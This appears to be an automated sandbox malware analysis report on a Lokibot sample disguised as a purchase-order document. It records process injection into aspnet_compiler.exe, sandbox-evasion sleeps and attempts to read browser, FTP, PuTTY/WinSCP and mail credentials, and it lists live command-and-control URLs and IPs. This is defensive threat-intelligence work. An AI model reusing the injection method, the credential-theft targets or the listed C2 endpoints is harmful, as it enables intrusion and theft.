Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Memory allocated: 1700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe TID: 4932	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6392	Thread sleep time: -540000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

2_2_00403D74

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.0000000004292000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.0000000004323000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.00000000041DA000.00000004.00000800.00020000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.00000000040FF000.00000004.00000800.00020000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.0000000004230000.00000004.00000800.00020000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.00000000043F8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.000000000436A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
Source: aspnet_compiler.exe, 00000002.00000002.2590229710.0000000000E68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]

2_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,

2_2_00402B7C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.(PO403810)_VOLEX_doc.exe.30f94d0.1.raw.unpack, BATMAN.cs	Reference to suspicious API methods: WriteProcessMemory_API(processInformation.HasanHandle, num9 + 8, bytes, 4, ref bytesWritten)
Source: 0.2.(PO403810)_VOLEX_doc.exe.30f94d0.1.raw.unpack, BATMAN.cs	Reference to suspicious API methods: ReadProcessMemory_API(processInformation.HasanHandle, num9 + 8, ref buffer, 4, ref bytesWritten)
Source: 0.2.(PO403810)_VOLEX_doc.exe.30f94d0.1.raw.unpack, BATMAN.cs	Reference to suspicious API methods: VirtualAllocEx_API(processInformation.HasanHandle, 0, length, 12288, 64)

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 9D5008	Jump to behavior

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Jump to behavior

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe

Queries volume information: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: (PO403810)_VOLEX_doc.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 720, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: PopPassword		2_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: SmtpPassword		2_2_0040D069

Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	311 Process Injection	1 Disable or Modify Tools	2 Credentials in Registry	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	2 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	311 Process Injection	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
(PO403810)_VOLEX_doc.exe	53%	ReversingLabs	Win32.Trojan.Leonem
(PO403810)_VOLEX_doc.exe	100%	Avira	TR/Dropper.MSIL.Gen
(PO403810)_VOLEX_doc.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://alphastand.top/alien/fre.php	100%	Avira URL Cloud	phishing
http://alphastand.trade/alien/fre.php	100%	Avira URL Cloud	malware
http://alphastand.win/alien/fre.php	100%	Avira URL Cloud	phishing
https://dddotx.shop/Mine/PWS/fre.php	100%	Avira URL Cloud	malware
http://www.ibsensoftware.com/	0%	Avira URL Cloud	safe
http://kbfvzoboss.bid/alien/fre.php	100%	Avira URL Cloud	phishing
http://dddotx.shop/Mine/PWS/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dddotx.shop	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://dddotx.shop/Mine/PWS/fre.php	true	Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	true	Avira URL Cloud: phishing	unknown
http://alphastand.win/alien/fre.php	true	Avira URL Cloud: phishing	unknown
http://alphastand.trade/alien/fre.php	true	Avira URL Cloud: malware	unknown
http://alphastand.top/alien/fre.php	true	Avira URL Cloud: phishing	unknown
http://dddotx.shop/Mine/PWS/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	dddotx.shop	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1517995
Start date and time:	2024-09-25 10:18:03 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	(PO403810)_VOLEX_doc.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 46 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: (PO403810)_VOLEX_doc.exe

Simulations

Behavior and APIs

Time	Type	Description
04:19:10	API Interceptor	135x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/DiF66Hbf/download
	http://easyantrim.pages.dev/id.html	Get hash	malicious	HTMLPhisher	Browse	easyantrim.pages.dev/id.html
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/13rSMZZi/download
	Purchase Order_ AEPL-2324-1126.exe	Get hash	malicious	FormBook	Browse	www.rtpngk.xyz/yhsl/
	PO-001.exe	Get hash	malicious	FormBook	Browse	www.x0x9x8x8x7x6.shop/assb/
	PO2024033194.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/4hfb/
	ADNOC REQUESTS & reviews.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	updater.exe	Get hash	malicious	Unknown	Browse	microsoft-rage.world/Api/v3
	http://www.pro-pharma.co.uk	Get hash	malicious	Unknown	Browse	proph.co.uk/blog/
	DHL documents_PDF.exe	Get hash	malicious	FormBook	Browse	www.hindo.top/b31a/?xVJtG4Qx=NzSChTKNjjtA9oOpLl4rXJIvEV3PrPKyZnQBhjSYE3dzUwTxd/TkmyQCL+Cn4jVtP9cc&9rT=ndrxUr

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	104.18.38.76
	LaWl4DY2kW.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	CSBls4grBI.exe	Get hash	malicious	LummaC, Socks5Systemz	Browse	188.114.96.3
	AWS 1301241710.docx.doc	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.97.9
	RFQ-948563836483638563735435376354.xls	Get hash	malicious	Remcos, GuLoader	Browse	188.114.96.3
	ACeTKO93e9.exe	Get hash	malicious	LummaC	Browse	104.21.58.182
	LNGHLELNes.exe	Get hash	malicious	LummaC	Browse	172.67.188.74
	New_Document-660128863990.wsf	Get hash	malicious	Unknown	Browse	188.114.96.3
	SKMBT_C22024082310420.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	New_Document-660119928827.wsf	Get hash	malicious	Unknown	Browse	188.114.97.3

Process:	C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	50
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	871BDD96B159C14D15C8D97D9111E9C8
SHA1:	8CD537A621659C289F0707BAD94719B5782DDB1F
SHA-256:	CC2786E1F9910A9D811400EDCDDAF7075195F7A16B216DCBEFBA3BC7C4F2AE51
